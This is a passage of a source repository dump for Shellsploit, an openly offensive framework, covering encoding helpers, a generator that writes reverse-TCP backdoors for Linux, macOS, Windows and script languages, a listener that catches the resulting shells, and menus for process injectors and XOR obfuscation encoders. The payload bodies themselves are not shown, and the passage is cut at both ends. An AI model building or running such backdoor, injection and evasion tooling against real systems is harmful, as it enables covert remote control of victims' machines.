b64encode,b64decode 17 | return b64encode(TEXT.encode('utf-8')).decode('utf-8') if choice == "encode" else b64decode(TEXT).decode("utf-8") 18 | 19 | def base32( TEXT, choice): 20 | from base64 import b32encode,b32decode 21 | return b32encode(TEXT.encode('utf-8')).decode('utf-8') if choice == "encode" else b32decode(TEXT).decode("utf-8") 22 | 23 | def base16( TEXT, choice): 24 | from base64 import b16encode,b16decode 25 | return b16encode(TEXT.encode('utf-8')).decode('utf-8') if choice == "encode" else b16decode(TEXT).decode("utf-8") 26 | 27 | def hex_( TEXT, choice): 28 | from codecs import encode,decode 29 | return encode(TEXT.encode('utf-8'), "hex").decode('utf-8') if choice == "encode" else decode(TEXT, "").decode("utf-8") 30 | 31 | def md5( TEXT): 32 | from hashlib import md5 33 | return md5(TEXT.encode("utf-8")).hexdigest() 34 | 35 | def sha1( TEXT): 36 | from hashlib import sha1 37 | return sha1(TEXT.encode("utf-8")).hexdigest() 38 | 39 | def sha224( TEXT): 40 | from hashlib import sha224 41 | return sha224(TEXT.encode("utf-8")).hexdigest() 42 | 43 | def sha256( TEXT): 44 | from hashlib import sha256 45 | return sha256(TEXT.encode("utf-8")).hexdigest() 46 | 47 | def sha384( TEXT): 48 | from hashlib import sha384 49 | return sha384(TEXT.encode("utf-8")).hexdigest() 50 | 51 | def sha512( TEXT): 52 | from hashlib import sha512 53 | return sha512(TEXT.encode("utf-8")).hexdigest() 54 | 55 | 56 | def AES( TEXT, KEY, choice): 57 | from sys import version_info 58 | from base64 import b64encode,b64decode 59 | 60 | try: 61 | from Crypto.Cipher import AES 62 | from Crypto import Random 63 | except ImportError: 64 | """ 65 | ıf you cant install that damn thing into windows follow these steps; 66 | Ref : http://stackoverflow.com/a/11405769 67 | 1) Install : https://www.microsoft.com/en-us/download/details.aspx?id=44266 68 | 2) easy_install http://www.voidspace.org.uk/python/pycrypto-2.6.1/pycrypto-2.6.1.win32-py2.7.exe 69 | 70 | """ 71 | print ("\npycrypto must be installed.\n") 72 | return False 73 | 74 | #AES key must be either 16, 24, or 32 bytes long 75 | BS = len(KEY) if len(KEY) % 16 == 0 or len(KEY) % 24 == 0 or len(KEY) % 32 == 0 else False 76 | pad = lambda s: s + (BS - len(s) % BS) * chr(BS - len(s) % BS) 77 | unpad = lambda s : s[:-ord(s[len(s)-1:])] 78 | 79 | if choice == "encode": 80 | raw = pad(TEXT) 81 | iv = Random.new().read(AES.block_size) 82 | cipher = AES.new(KEY, AES.MODE_CBC, iv) 83 | return b64encode(iv + cipher.encrypt( raw)) if version_info[0] == 2 else b64encode(iv + cipher.encrypt( raw), "encode").decode("utf-8") 84 | else: 85 | enc = b64decode(TEXT) 86 | iv = enc[:16] 87 | cipher = AES.new(KEY, AES.MODE_CBC, iv) 88 | return unpad(cipher.decrypt( enc[16:])) if version_info[0] == 2 else unpad(cipher.decrypt( enc[16:])).decode("utf-8") 89 | 90 | -------------------------------------------------------------------------------- /shell/Session/generator.py: -------------------------------------------------------------------------------- 1 | #------------------Bombermans Team---------------------------------# 2 | #Author : B3mB4m 3 | #Concat : b3mb4m@protonmail.com 4 | #Project : https://github.com/b3mb4m/Shellsploit 5 | #LICENSE : https://github.com/b3mb4m/Shellsploit/blob/master/LICENSE 6 | #------------------------------------------------------------------# 7 | 8 | def process( data, HOST, PORT, ENCODER=False, logger=True): 9 | logfile = None 10 | extension = None 11 | if logger == True: 12 | from random import randint 13 | from os import path 14 | while True: 15 | logfile = "{0}.".format(str(randint(0, 999999999))) 16 | if not path.isfile(logfile): 17 | break 18 | else: 19 | logfile = logger 20 | 21 | 22 | if data == "backdoors/linux86/reverse_tcp": 23 | from .backdoors.main import linx86reverse_tcp 24 | extension = "elf" 25 | logs = linx86reverse_tcp( HOST,PORT) 26 | elif data == "backdoors/osx86/reverse_tcp": 27 | from .backdoors.main import macosx86reverse_tcp 28 | extension = "macho" 29 | logs = macosx86reverse_tcp( HOST,PORT) 30 | elif data == "backdoors/linux64/reverse_tcp": 31 | from .backdoors.main import linx64reverse_tcp 32 | extension = "elf" 33 | logs = linx64reverse_tcp( HOST,PORT) 34 | #elif data == "osx/x64/reverse_tcp": 35 | #pass 36 | #elif data == "windows/x86/reverse_tcp": 37 | #from backdoors.main import winreverse_tcp 38 | #extension = "exe" 39 | #logs = winreverse_tcp( HOST,PORT) 40 | 41 | 42 | 43 | 44 | #elif data == "backdoors/php/reverse_tcp": 45 | # pass 46 | #elif data == "backdoors/asp/reverse_tcp": 47 | # pass 48 | #elif data == "backdoors/jsp/reverse_tcp": 49 | # pass 50 | #elif data == "backdoors/war/reverse_tcp": 51 | # pass 52 | 53 | 54 | elif data == "backdoors/unix/python/reverse_tcp": 55 | from .backdoors.main import pyreverse_tcp 56 | extension = "py" 57 | logs = pyreverse_tcp( HOST,PORT) 58 | elif data == "backdoors/unix/perl/reverse_tcp": 59 | from .backdoors.main import plreverse_tcp 60 | extension = "pl" 61 | logs = plreverse_tcp( HOST,PORT) 62 | elif data == "backdoors/unix/bash/reverse_tcp": 63 | from .backdoors.main import shreverse_tcp 64 | extension = "sh" 65 | logs = shreverse_tcp( HOST,PORT) 66 | elif data == "backdoors/unix/ruby/reverse_tcp": 67 | from .backdoors.main import rbreverse_tcp 68 | extension = "rb" 69 | logs = rbreverse_tcp( HOST,PORT) 70 | elif data == "backdoors/windows/asm/reverse_tcp": 71 | from .backdoors.main import asmreverse_tcp 72 | extension = "s" 73 | logs = asmreverse_tcp( HOST,PORT) 74 | elif data == "backdoors/windows/ps/reverse_tcp": 75 | from .backdoors.main import powershell 76 | extension = "ps1" 77 | logs = powershell( HOST,PORT) 78 | 79 | 80 | savefile = [logfile if logger != True else logfile+extension] 81 | if data in [ 82 | "backdoors/linux86/reverse_tcp", 83 | "backdoors/osx86/reverse_tcp", 84 | "backdoors/osx64/reverse_tcp", 85 | "backdoors/windowsx86/reverse_tcp" 86 | ]: 87 | 88 | exploit = open(savefile[0], "wb") 89 | exploit.write(logs.decode("hex")) 90 | else: 91 | exploit = open(savefile[0], "w") 92 | exploit.write(logs) 93 | exploit.close() 94 | 95 | import os 96 | path = os.getcwd()+os.sep+savefile[0].replace("\n", "") 97 | if ENCODER: 98 | from shell.encoders.py.starter import control 99 | control(payload=ENCODER, files=[path]) 100 | print ("\n\n\t Exploit Location : {0} \n\n".format(path)) 101 | 102 | 103 | 104 | -------------------------------------------------------------------------------- /shell/Session/netcat.py: -------------------------------------------------------------------------------- 1 | from __future__ import print_function 2 | from socket import socket, AF_INET, SOCK_STREAM, SOCK_DGRAM, SOL_SOCKET, SO_REUSEADDR 3 | from threading import Thread 4 | from select import select 5 | from time import sleep 6 | from sys import exit 7 | 8 | listening = False 9 | clisock = None 10 | done = False 11 | 12 | #Beta script for listener. 13 | #Same effect nc -vlp [PORT] 14 | 15 | 16 | #Greetz: 17 | #Goodies 18 | #https://twitter.com/GoodiesHQ 19 | 20 | 21 | 22 | try: 23 | input = raw_input 24 | except NameError: 25 | pass 26 | 27 | def listen(port=4444): 28 | global clisock, listening, done 29 | s = socket(AF_INET, SOCK_STREAM) 30 | s.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1) 31 | s.bind(('0.0.0.0', port)) 32 | s.listen(3) 33 | listening = True 34 | sock, addr = s.accept() 35 | clisock = sock 36 | print("Client connected from {}".format(addr)) 37 | data = "" 38 | while listening: 39 | try: 40 | rr, _, _ = select([sock,], [], [], 1) 41 | if rr: 42 | data = sock.recv(1024) 43 | print("{}".format(data), end="") 44 | except: 45 | exit() 46 | print("Done listening.") 47 | done = True 48 | 49 | def write(): 50 | global clisock, listening, done 51 | while True: 52 | if clisock: 53 | data = input() 54 | if data.strip().lower() in ["exit", "quit"]: 55 | clisock.close() 56 | exit() 57 | listening = False 58 | while not done: sleep(0.1) 59 | break 60 | _, wr, _ = select([], [clisock,], [], 1) 61 | if wr: 62 | clisock.sendall(data + "\n") 63 | else: 64 | pass 65 | 66 | 67 | def nc( PORT=4444): 68 | listenThread = Thread(target=listen, args=(int(PORT),)) 69 | writeThread = Thread(target=write) 70 | listenThread.start() 71 | writeThread.start() 72 | -------------------------------------------------------------------------------- /shell/__init__.py: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /shell/core/Comp/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/vasco2016/shellsploit-framework/04eb4a0449acaba0b70c40a78c61a0d5e2527406/shell/core/Comp/__init__.py -------------------------------------------------------------------------------- /shell/core/Comp/db.py: -------------------------------------------------------------------------------- 1 | #------------------Bombermans Team---------------------------------# 2 | #Author : B3mB4m 3 | #Concat : b3mb4m@protonmail.com 4 | #Project : https://github.com/b3mb4m/Shellsploit 5 | #LICENSE : https://github.com/b3mb4m/Shellsploit/blob/master/LICENSE 6 | #------------------------------------------------------------------# 7 | 8 | 9 | from shell.payloads import * 10 | 11 | 12 | def shellsploitlist(): 13 | list = [ 14 | "help", 15 | "os", 16 | "use", 17 | "clear", 18 | "show", 19 | "shellcodes", 20 | "backdoors", 21 | "injectors", 22 | "encoders", 23 | 24 | ] 25 | all_sc_modules = [] 26 | for platforms in shellcodeModules.keys(): 27 | for shellcodeType in shellcodeModules[platforms]: 28 | all_sc_modules.append("{}/{}".format(platforms,shellcodeType)) 29 | for shellcode in all_sc_modules: 30 | list.append(shellcode) 31 | return list 32 | 33 | 34 | def shellcodelist(): 35 | return [ 36 | "back", 37 | "set", 38 | "unset", 39 | "ip", 40 | "os", 41 | "clear", 42 | "disas", 43 | "whatisthis", 44 | "iteration", 45 | "generate", 46 | "output", 47 | "show", 48 | "encoders", 49 | "options", 50 | "help", 51 | ] 52 | 53 | 54 | 55 | 56 | def injectorlist(): 57 | return [ 58 | "set", 59 | "unset", 60 | "help", 61 | "back", 62 | "os", 63 | "getpid", 64 | "clear", 65 | "inject", 66 | "iteration", 67 | "show", 68 | "options", 69 | "shellcode", 70 | ] 71 | 72 | 73 | 74 | def backdoorlist(): 75 | return [ 76 | "set", 77 | "unset", 78 | "help", 79 | "back", 80 | "os", 81 | "clear", 82 | "generate", 83 | "show", 84 | "options", 85 | ] 86 | 87 | 88 | 89 | 90 | 91 | 92 | 93 | 94 | 95 | 96 | 97 | 98 | 99 | -------------------------------------------------------------------------------- /shell/core/Comp/tab.py: -------------------------------------------------------------------------------- 1 | #------------------Bombermans Team---------------------------------# 2 | #Author : B3mB4m 3 | #Concat : b3mb4m@protonmail.com 4 | #Project : https://github.com/b3mb4m/Shellsploit 5 | #LICENSE : https://github.com/b3mb4m/Shellsploit/blob/master/LICENSE 6 | #------------------------------------------------------------------# 7 | 8 | import sys 9 | import os 10 | import readline 11 | 12 | 13 | 14 | class autocomplete(object): 15 | def __init__(self, options): 16 | self.options = sorted(options) 17 | return 18 | 19 | def complete(self, text, state): 20 | response = None 21 | if state == 0: 22 | if text: 23 | self.matches = [s 24 | for s in self.options 25 | if s and s.startswith(text) 26 | ] 27 | else: 28 | self.matches = self.options[:] 29 | 30 | try: 31 | response = self.matches[state] 32 | except IndexError: 33 | response = None 34 | return response 35 | 36 | 37 | 38 | def completion( control=False): 39 | if control == "shellsploit": 40 | from .db import shellsploitlist 41 | readline.set_completer(autocomplete(shellsploitlist()).complete) 42 | readline.parse_and_bind('tab: complete') 43 | 44 | elif control == "shellcodes": 45 | from .db import shellcodelist 46 | readline.set_completer(autocomplete(shellcodelist()).complete) 47 | readline.parse_and_bind('tab: complete') 48 | 49 | elif control == "injectors": 50 | from .db import injectorlist 51 | readline.set_completer(autocomplete(injectorlist()).complete) 52 | readline.parse_and_bind('tab: complete') 53 | 54 | elif control == "backdoors": 55 | from .db import backdoorlist 56 | readline.set_completer(autocomplete(backdoorlist()).complete) 57 | readline.parse_and_bind('tab: complete') 58 | 59 | 60 | -------------------------------------------------------------------------------- /shell/core/Injectoroptions.py: -------------------------------------------------------------------------------- 1 | #------------------Bombermans Team---------------------------------# 2 | #Author : B3mB4m 3 | #Concat : b3mb4m@protonmail.com 4 | #Project : https://github.com/b3mb4m/Shellsploit 5 | #LICENSE : https://github.com/b3mb4m/Shellsploit/blob/master/LICENSE 6 | #------------------------------------------------------------------# 7 | 8 | from color import * 9 | from os import sep 10 | 11 | def controlset( string, argv, argv1, argv2=None): 12 | #depends to pid 13 | list1 = [ 14 | "injectors/Linux86/ptrace", 15 | "injectors/Linux64/ptrace", 16 | "injectors/Windows/Dllinjector", 17 | ] 18 | 19 | #depends to dll 20 | list2 = [ 21 | "injectors/Windowsx86/tLsInjectorDLL", 22 | ] 23 | 24 | #depends to exe 25 | list3 = [ 26 | "injectors/Windowsx86/CodecaveInjector", 27 | ] 28 | 29 | 30 | #BFD Scripts 31 | list4 = [ 32 | "injectors/Windows/BFD/Patching", 33 | "injectors/MacOSX/BFD/Patching", 34 | "injectors/Linux/BFD/Patching", 35 | "injectors/Linux/ARM/x86/BFD/Patching", 36 | "injectors/FreeBSD/x86/BFD/Patching", 37 | ] 38 | 39 | 40 | if len(argv) >= len(argv1): 41 | if len(argv) == 0: 42 | padd = 8 43 | elif len(argv) == 1: 44 | padd = 8 45 | elif len(argv) == 2: 46 | padd = 8 47 | else: 48 | padd = len(argv)+5 49 | else: 50 | padd = len(argv1)+5 51 | 52 | 53 | if string in list1: 54 | print (bcolors.GREEN+""" 55 | Module options ({0}): 56 | 57 | \tName\t\t{1}\t\tRequired\tDescription 58 | \t----\t\t{2}\t\t--------\t----------- 59 | \tpid\t\t{3}\t\tyes\t\tProcess ID 60 | \tshellcode\t{4}\t\tyes\t\tInject Bytes 61 | """.format(string,"Current Setting".ljust(padd),"---------------".ljust(padd), 62 | argv.ljust(padd),argv1.ljust(padd))) 63 | 64 | elif string in list2: 65 | print (bcolors.GREEN+""" 66 | Module options ({0}): 67 | 68 | \tName\t\t{1}\t\tRequired\tDescription 69 | \t----\t\t{2}\t\t--------\t----------- 70 | \texe\t\t{3}\t\tyes\t\tTarget exe file 71 | \tdll\t\t{4}\t\tyes\t\tDll file to injection 72 | """.format(string,"Current Setting".ljust(padd),"---------------".ljust(padd), 73 | argv.ljust(padd),argv1.ljust(padd))) 74 | 75 | 76 | elif string in list3: 77 | print (bcolors.GREEN+""" 78 | Module options ({0}): 79 | 80 | \tName\t\t{1}\t\tRequired\tDescription 81 | \t----\t\t{2}\t\t--------\t----------- 82 | \texe\t\t{3}\t\tyes\t\tTarget exe file 83 | \tshellcode\t{4}\t\tyes\t\tInject Bytes 84 | """.format(string,"Current Setting".ljust(padd),"---------------".ljust(padd), 85 | argv.ljust(padd),argv1.ljust(padd))) 86 | 87 | 88 | 89 | elif string in list4: 90 | if sep in argv: 91 | argv = argv.split(sep)[-1] 92 | 93 | print (bcolors.GREEN+""" 94 | Module options ({0}): 95 | 96 | \tName\t\t{1}\t\tRequired\tDescription 97 | \t----\t\t{2}\t\t--------\t----------- 98 | \tfile\t\t{3}\t\tyes\t\tFile name&path 99 | \thost\t\t{4}\t\tyes\t\tEncoder type 100 | \tport\t\t{5}\t\tyes\t\tIteration times 101 | """.format(string,"Current Setting".ljust(padd),"---------------".ljust(padd), 102 | argv.ljust(padd),argv1.ljust(padd),argv2.ljust(padd))) 103 | 104 | 105 | -------------------------------------------------------------------------------- /shell/core/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/vasco2016/shellsploit-framework/04eb4a0449acaba0b70c40a78c61a0d5e2527406/shell/core/__init__.py -------------------------------------------------------------------------------- /shell/core/backdoors.py: -------------------------------------------------------------------------------- 1 | #------------------Bombermans Team---------------------------------# 2 | #Author : B3mB4m 3 | #Concat : b3mb4m@protonmail.com 4 | #Project : https://github.com/b3mb4m/Shellsploit 5 | #LICENSE : https://github.com/b3mb4m/Shellsploit/blob/master/LICENSE 6 | #------------------------------------------------------------------# 7 | 8 | from .color import * 9 | 10 | 11 | #That encoders can be use on "injectors" .. 12 | def encoderlist( require=False): 13 | if require != False: 14 | data = [ 15 | "encoders/py/bzip2", 16 | "encoders/py/gzip", 17 | "encoders/shellcode/intel/x86/xor86.py", 18 | "encoders/shellcode/intel/x86/xor_b3m.py", 19 | "encoders/shellcode/intel/x86/xor64.py", 20 | ] 21 | return data 22 | else: 23 | print (bcolors.GREEN+""" 24 | 25 | Python 26 | ======== 27 | 28 | encoders/py/bzip2 29 | encoders/py/gzip 30 | 31 | 32 | Shellcode 33 | ========== 34 | 35 | encoders/shellcode/intel/x86/xor86.py 36 | encoders/shellcode/intel/x86/xor_b3m.py 37 | 38 | 39 | """ + bcolors.ENDC) 40 | 41 | #encoders/shellcode/intel/x86/xor64.py 42 | 43 | 44 | def backdoorlist( require=False): 45 | if require != False: 46 | data = [ 47 | "backdoors/linux86/reverse_tcp", 48 | "backdoors/linux64/reverse_tcp", 49 | "backdoors/osx86/reverse_tcp", 50 | "backdoors/osx64/reverse_tcp", 51 | "backdoors/windows/x86/reverse_tcp", 52 | 53 | # "backdoors/php/reverse_tcp", 54 | # "backdoors/asp/reverse_tcp", 55 | # "backdoors/jsp/reverse_tcp", 56 | # "backdoors/war/reverse_tcp", 57 | 58 | "backdoors/unix/python/reverse_tcp", 59 | "backdoors/unix/perl/reverse_tcp", 60 | "backdoors/unix/bash/reverse_tcp", 61 | "backdoors/unix/ruby/reverse_tcp", 62 | "backdoors/windows/asm/reverse_tcp", 63 | "backdoors/windows/ps/reverse_tcp", 64 | 65 | 66 | ] 67 | return data 68 | else: 69 | print (bcolors.GREEN+""" 70 | 71 | Binaries 72 | ========== 73 | 74 | backdoors/linux86/reverse_tcp 75 | backdoors/linux64/reverse_tcp 76 | backdoors/osx86/reverse_tcp 77 | backdoors/windowsx86/reverse_tcp - [Passive] 78 | backdoors/windowsx64/reverse_tcp - [Passive] 79 | 80 | 81 | Scripting Payloads 82 | =================== 83 | 84 | backdoors/unix/python/reverse_tcp 85 | backdoors/unix/perl/reverse_tcp 86 | backdoors/unix/bash/reverse_tcp 87 | backdoors/unix/ruby/reverse_tcp 88 | backdoors/windows/asm/reverse_tcp 89 | backdoors/windows/ps/reverse_tcp 90 | 91 | """ + bcolors.ENDC) 92 | 93 | 94 | 95 | #Web Payloads 96 | #============= 97 | 98 | # backdoors/php/reverse_tcp - [Passive] 99 | # backdoors/asp/reverse_tcp - [Passive] 100 | # backdoors/jsp/reverse_tcp - [Passive] 101 | # backdoors/war/reverse_tcp - [Passive] -------------------------------------------------------------------------------- /shell/core/color.py: -------------------------------------------------------------------------------- 1 | #------------------Bombermans Team---------------------------------# 2 | #Author : B3mB4m 3 | #Concat : b3mb4m@protonmail.com 4 | #Project : https://github.com/b3mb4m/Shellsploit 5 | #LICENSE : https://github.com/b3mb4m/Shellsploit/blob/master/LICENSE 6 | #------------------------------------------------------------------# 7 | 8 | #https://svn.blender.org/svnroot/bf-blender/trunk/blender/build_files/scons/tools/bcolors.py 9 | class bcolors: 10 | HEADER = '\033[95m' 11 | OKBLUE = '\033[94m' 12 | GREEN = '\033[32m' 13 | WARNING = '\033[93m' 14 | FAIL = '\033[91m' 15 | ENDC = '\033[0m' 16 | BOLD = '\033[1m' 17 | RED = '\033[1;31m' 18 | UNDERLINE = '\033[4m' 19 | -------------------------------------------------------------------------------- /shell/core/commands.py: -------------------------------------------------------------------------------- 1 | #------------------Bombermans Team---------------------------------# 2 | #Author : B3mB4m 3 | #Concat : b3mb4m@protonmail.com 4 | #Project : https://github.com/b3mb4m/Shellsploit 5 | #LICENSE : https://github.com/b3mb4m/Shellsploit/blob/master/LICENSE 6 | #------------------------------------------------------------------# 7 | 8 | def clean(): 9 | from os import name,system 10 | if name == "nt": 11 | return system('cls') 12 | else: 13 | return system('clear') 14 | 15 | def IP(): 16 | from urllib2 import urlopen 17 | from re import findall 18 | 19 | lists = [ 20 | "http://www.get-ip.me/", 21 | "http://checkip.dyndns.org/", 22 | "http://whatsmyip.net/", 23 | "http://mxtoolbox.com/WhatIsMyIP/", 24 | ] 25 | 26 | for x in lists: 27 | try: 28 | data = urlopen(x, timeout=2).read() 29 | grab = findall('([0-9]+\.[0-9]+\.[0-9]+\.[0-9]+)', data) 30 | ip = grab[0] 31 | break 32 | except: 33 | pass 34 | 35 | if len(ip) < 0: 36 | return "NAT IP Not founded." 37 | else: 38 | nat = "IP : %s\t-NAT" % ip 39 | localIP( nat) 40 | 41 | def localIP( natip): 42 | #http://stackoverflow.com/questions/166506/finding-local-ip-addresses-using-pythons-stdlib 43 | import socket 44 | print ("\n"+natip) 45 | try: 46 | print ("IP : {0}\t-Local".format([l for l in ([ip for ip in socket.gethostbyname_ex(socket.gethostname())[2] if not ip.startswith("127.")][:1], [[(s.connect(('8.8.8.8', 80)), s.getsockname()[0], s.close()) for s in [socket.socket(socket.AF_INET, socket.SOCK_DGRAM)]][0][1]]) if l][0][0])) 47 | except: 48 | print ("Local IP Not founded.") 49 | print ("") 50 | 51 | 52 | def pids( check=None, name=None): 53 | #It currently supports Linux, Windows, OSX, FreeBSD and Sun Solaris, 54 | #both 32-bit and 64-bit architectures, with Python versions from 2.6 to 3.5 55 | #(users of Python 2.4 and 2.5 may use 2.1.3 version). 56 | from psutil import process_iter 57 | 58 | if check == "wholelist": 59 | print ("") 60 | for p in process_iter(): 61 | try: 62 | print ('\tPID: {0} \t\t {1}'.format(p.pid,p.name())) 63 | except: 64 | pass 65 | print ("") 66 | 67 | else: 68 | cache = None 69 | print ("") 70 | for p in process_iter(): 71 | try: 72 | if name.lower() in p.name().lower(): 73 | cache = True 74 | print ('\tPID: {0} \t\t {1}'.format(p.pid,p.name())) 75 | except: 76 | pass 77 | print ("") 78 | if cache == None: 79 | print ("PID not founded for : {0} ".format(name)) 80 | 81 | 82 | def oscommand( command): 83 | from os import system 84 | try: 85 | print ("") 86 | system( command) 87 | except Exception as error: 88 | return "Unexpected error : %s " % error 89 | 90 | 91 | 92 | def web2ip( target): 93 | import socket 94 | try: 95 | return socket.gethostbyname(target) 96 | except Exception as error: 97 | return "Unexpected error : %s " % error 98 | 99 | -------------------------------------------------------------------------------- /shell/core/help.py: -------------------------------------------------------------------------------- 1 | #------------------Bombermans Team---------------------------------# 2 | #Author : B3mB4m 3 | #Concat : b3mb4m@protonmail.com 4 | #Project : https://github.com/b3mb4m/Shellsploit 5 | #LICENSE : https://github.com/b3mb4m/Shellsploit/blob/master/LICENSE 6 | #------------------------------------------------------------------# 7 | 8 | from .color import * 9 | 10 | def mainhelp(): 11 | print (bcolors.GREEN+""" 12 | Usage Commands 13 | =============== 14 | \tCommands Description 15 | \t------------ ------------- 16 | \thelp Help menu 17 | \tos Command directly ur computer 18 | \tuse Select Module For Use 19 | \tclear Clear the menu 20 | \tshow shellcodes Show Shellcodes of Current Database 21 | \tshow backdoors Show Backdoors of Current Database 22 | \tshow injectors Show Injectors(Shellcode,dll,so etc..) 23 | \tshow encoders Show Encoders(Py,Ruby,PHP,Shellcode etc..) 24 | """) 25 | 26 | def shellcodehelp(): 27 | print (bcolors.GREEN+""" 28 | Shellcode Commands 29 | =================== 30 | \tCommands Description 31 | \t------------ ------------- 32 | \tback Exit Current Module 33 | \tset Set Value Of Options To Modules 34 | \tunset Unset Value Of Options To Modules 35 | \tip Get IP address(Requires net connection) 36 | \tos Command directly ur computer 37 | \tclear Clear the menu 38 | \tdisas Disassembly the shellcode(Support : x86/x64) 39 | \twhatisthis Learn which kind of shellcode it is 40 | \titeration Encoder iteration time 41 | \tgenerate Generate shellcode 42 | \toutput Save option to shellcode(txt,py,c,cpp,exe,raw,dll) 43 | \tshow encoders List all obfucscation encoders 44 | \tshow options Show Current Options Of Selected Module 45 | """) 46 | 47 | def injectorhelp(): 48 | print (bcolors.GREEN+""" 49 | Injector Commands 50 | =================== 51 | Commands Description 52 | ------------ \t------------- 53 | set Set Value Of Options To Modules 54 | unset Unset Value Of Options To Modules 55 | help Help menu 56 | back Exit Current Module 57 | os Command directly ur computer 58 | pids Get PID list of computer 59 | getpid Get specific PID on list(Ex. getpid Python) 60 | clear Clear the menu 61 | inject Start injector 62 | show options Show current options of selected module 63 | show shellcode Show current shellcode of selected module 64 | """) 65 | 66 | 67 | def backdoorshelp(): 68 | print (bcolors.GREEN+""" 69 | Injector Commands 70 | =================== 71 | Commands Description 72 | ------------ \t------------- 73 | set Set Value Of Options To Modules 74 | unset Unset Value Of Options To Modules 75 | help Help menu 76 | back Exit Current Module 77 | os Command directly ur computer 78 | clear Clear the menu 79 | generate Generate backdoor 80 | show options Show current options of selected module 81 | """) 82 | -------------------------------------------------------------------------------- /shell/core/lists.py: -------------------------------------------------------------------------------- 1 | #------------------Bombermans Team---------------------------------# 2 | #Author : B3mB4m 3 | #Concat : b3mb4m@protonmail.com 4 | #Project : https://github.com/b3mb4m/Shellsploit 5 | #LICENSE : https://github.com/b3mb4m/Shellsploit/blob/master/LICENSE 6 | #------------------------------------------------------------------# 7 | 8 | def encoderlist(): 9 | print (""" 10 | Encoders 11 | ======== 12 | 13 | \tName\t\t\tRank\t\tDescription 14 | \t----\t\t\t----\t\t----------- 15 | \tx86/xor\t\t\tnormal\t\tXOR Encoder 16 | \tx86/xor_b3m [BETA]\texcellent\tPolymorphic XOR Additive Feedback Encoder 17 | 18 | """) 19 | 20 | 21 | #\tx64/xor\t\t\tnormal\t\tXOR Encoder 22 | #\tx86/add_sub\t\tmanual\t\tAdd/Sub Encoder 23 | #\tx86/alpha_mixed\t\tlow\t\tAlpha2 Alphanumeric Mixedcase Encoder 24 | #\tx86/alpha_upper\t\tlow\t\tAlpha2 Alphanumeric Uppercase Encoder 25 | #\tx86/countdown\t\tnormal\t\tSingle-byte XOR Countdown Encoder 26 | #\tx86/nonalpha\t\tlow\t\tNon-Alpha Encoder 27 | #\tx86/nonupper\t\tlow\t\tNon-Upper Encoder 28 | 29 | def injectorlist(): 30 | print (""" 31 | \tArchitecture\t\t\t\t\tVersion 32 | \t============\t\t\t\t\t======= 33 | \t[+] injectors/Linux/x86/ptrace\t\t\tx86 34 | \t[+] injectors/Linux/x64/ptrace\t\t\tx64 35 | \t[+] injectors/Windows/x86/tLsInjectorDLL\tx86 36 | \t[+] injectors/Windows/x86/CodecaveInjector\tx86 37 | \t[+] injectors/Windows/Dllinjector\t\tx86/x64 38 | \t[+] injectors/Windows/BFD/Patching\t\tx86/x64 39 | """) 40 | 41 | #\t[+] injectors/MachOSX/BFD/Patching\t\tx86/x64 42 | #\t[+] injectors/Linux/BFD/Patching\t\tx86/x64 43 | #\t[+] injectors/Linux/ARM/BFD/Patching\t\tx86/x64 44 | #\t[+] injectors/FreeBSD/x86/BFD/Patching\t\tx86/x64 45 | 46 | 47 | 48 | def OSlist(): 49 | print (""" 50 | Operating System Architecture 51 | ================ ============ 52 | Linux x86 53 | Windows x86 54 | FreeBSD x86 55 | OpenBSD x86 56 | Solaris x86 57 | Linux PowerPC 58 | OpenBSD PowerPC 59 | Linux Sparc 60 | FreeBSD Sparc 61 | OpenBSD Sparc 62 | Solaris Sparc 63 | Linux ARM 64 | FreeBSD ARM 65 | OpenBSD ARM 66 | 67 | """) 68 | 69 | def encoders(): 70 | return [ 71 | "x64/xor", 72 | "x86/xor", 73 | #"x86/add_sub", 74 | #"x86/alpha_mixed", 75 | #"x86/alpha_upper", 76 | #"x86/countdown", 77 | #"x86/nonalpha", 78 | #"x86/nonupper", 79 | "x86/xor_b3m", 80 | ] 81 | -------------------------------------------------------------------------------- /shell/core/logo/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/vasco2016/shellsploit-framework/04eb4a0449acaba0b70c40a78c61a0d5e2527406/shell/core/logo/__init__.py -------------------------------------------------------------------------------- /shell/core/logo/counter.py: -------------------------------------------------------------------------------- 1 | #------------------Bombermans Team---------------------------------# 2 | #Author : B3mB4m 3 | #Concat : b3mb4m@protonmail.com 4 | #Project : https://github.com/b3mb4m/Shellsploit 5 | #LICENSE : https://github.com/b3mb4m/Shellsploit/blob/master/LICENSE 6 | #------------------------------------------------------------------# 7 | 8 | 9 | from os import getcwd 10 | from os import sep 11 | from os import walk 12 | from sys import platform 13 | from shell.encoders.py.payloads import * 14 | addEncoder = Encoders().ret() 15 | from shell.encoders.shellcode.payloads import * 16 | addEncoder += Encoders().ret() 17 | 18 | 19 | class B3mB4mLogo(object): 20 | def __init__(self): 21 | self.db = ["database", "OS", "encoders", "inject"] 22 | self.ret = [] 23 | self.magic = getcwd()+sep+"shell" 24 | if 'win' not in platform.lower(): 25 | self.magic = '/usr/share/shellsploit/'+sep 26 | self.ignore = ["BFDBackdoors", "pyminifier", "__pycache__"] 27 | self.decide = False 28 | 29 | def calculate(self, select, files=True): 30 | if files == True: 31 | self.cout = 0 32 | for root, dirs, files in walk(self.magic+sep+select, topdown=True): 33 | for x in files: 34 | if ".pyc" not in x and "__" not in x and ".md" not in x: 35 | if select == "inject": 36 | if "inject" in x.lower(): 37 | self.cout += 1 38 | else: 39 | if not x.endswith(".pyc"): 40 | if select == "encoders": 41 | continue 42 | else: 43 | self.cout += 1 44 | 45 | #ret function for encoders .. 46 | return self.cout+addEncoder if select == "encoders" else self.cout 47 | 48 | else: 49 | self.cout = 0 50 | for root, dirs, files in walk(self.magic+sep+select, topdown=True): 51 | if dirs in self.ignore: 52 | continue 53 | for x in dirs: 54 | if "__" not in x: 55 | self.cout += 1 56 | return self.cout 57 | 58 | def start(self): 59 | for x in self.db: 60 | if x != "OS": 61 | self.ret.append( self.calculate( x, True)) 62 | else: 63 | self.ret.append( self.calculate( "database", False)) 64 | return self.ret 65 | -------------------------------------------------------------------------------- /shell/core/logo/logo.py: -------------------------------------------------------------------------------- 1 | #------------------Bombermans Team---------------------------------# 2 | #Author : B3mB4m 3 | #Concat : b3mb4m@protonmail.com 4 | #Project : https://github.com/b3mb4m/Shellsploit 5 | #LICENSE : 